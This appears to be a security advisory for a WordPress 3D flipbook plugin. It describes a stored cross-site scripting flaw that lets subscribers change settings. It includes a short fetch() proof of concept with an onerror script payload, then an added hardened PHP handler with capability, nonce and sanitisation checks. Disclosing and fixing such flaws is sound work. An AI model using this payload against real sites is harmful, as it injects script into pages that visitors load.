The plugin does not perform authorisation or CSRF checks when updating its settings, and does not sanitise or escape the submitted values, allowing any authenticated user, such as a subscriber, to put Cross-Site Scripting payloads in all pages with a 3D flipbook.
As a subscriber:

fetch("/wp-admin/admin-ajax.php", {
  "headers": { "content-type": "application/x-www-form-urlencoded" },
  "body": "action=fb3d_receive_book_control_props&props[lightbox][default]=xxx\"><img src onerror=alert(/XSS/)>",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

The XSS will be triggered in all pages with a 3D flipbook.
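The three missing controls named above (authorisation, CSRF protection, and sanitisation/escaping) map directly onto standard WordPress API calls. The following is an added example of a hardened AJAX handler for this action, not the plugin's own code: the action name and the props[lightbox][default] parameter come from the advisory, while the option name, the nonce action name, the capability chosen and the rendering helper are assumptions.

```php
<?php
// Added example, not the 3D FlipBook plugin's code. Action name and the
// props[lightbox][default] parameter are from the advisory; option name,
// nonce action and the rendering helper are assumptions.

add_action( 'wp_ajax_fb3d_receive_book_control_props', 'fb3d_receive_book_control_props_hardened' );

function fb3d_receive_book_control_props_hardened() {
    // Authorisation: settings changes require a user who can manage options,
    // so a subscriber account is rejected before anything is stored.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // CSRF: require a nonce minted for this action (assumed name);
    // check_ajax_referer() dies with -1 if it is missing or invalid.
    check_ajax_referer( 'fb3d_settings_nonce', 'nonce' );

    $raw = isset( $_POST['props'] ) ? wp_unslash( $_POST['props'] ) : array();
    if ( ! is_array( $raw ) ) {
        wp_send_json_error( 'bad request', 400 );
    }

    // Sanitise on input: walk the nested props array and strip tags
    // from every leaf value, so "xxx\"><img src onerror=...>" is reduced
    // to plain text before it reaches the database.
    $clean = fb3d_sanitize_props_recursive( $raw );

    update_option( 'fb3d_book_control_props', $clean ); // assumed option name
    wp_send_json_success( $clean );
}

function fb3d_sanitize_props_recursive( $value ) {
    if ( is_array( $value ) ) {
        $out = array();
        foreach ( $value as $key => $item ) {
            $out[ sanitize_key( $key ) ] = fb3d_sanitize_props_recursive( $item );
        }
        return $out;
    }
    return sanitize_text_field( (string) $value );
}

// Escape on output: defence in depth for the front-end pages where the
// advisory says the payload fires. Even if a bad value were stored,
// esc_attr() keeps it inside the attribute.
function fb3d_render_lightbox_default_attr() {
    $props   = get_option( 'fb3d_book_control_props', array() );
    $default = isset( $props['lightbox']['default'] ) ? $props['lightbox']['default'] : '';
    return 'data-lightbox-default="' . esc_attr( $default ) . '"';
}
```

The legitimate settings page would pass a value from wp_create_nonce( 'fb3d_settings_nonce' ) in the `nonce` field of the same POST; a request without it, such as the one in the proof of concept, is rejected by check_ajax_referer() before the capability-passing administrator path is even reached. Sanitising on input and escaping on output are both kept because a fix that relies on only one of them leaves the other code path exposed the next time the settings format changes.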
Krzysztof Zając
Yes
2022-02-28 (about 11 months ago)
2022-04-17 (about 9 months ago)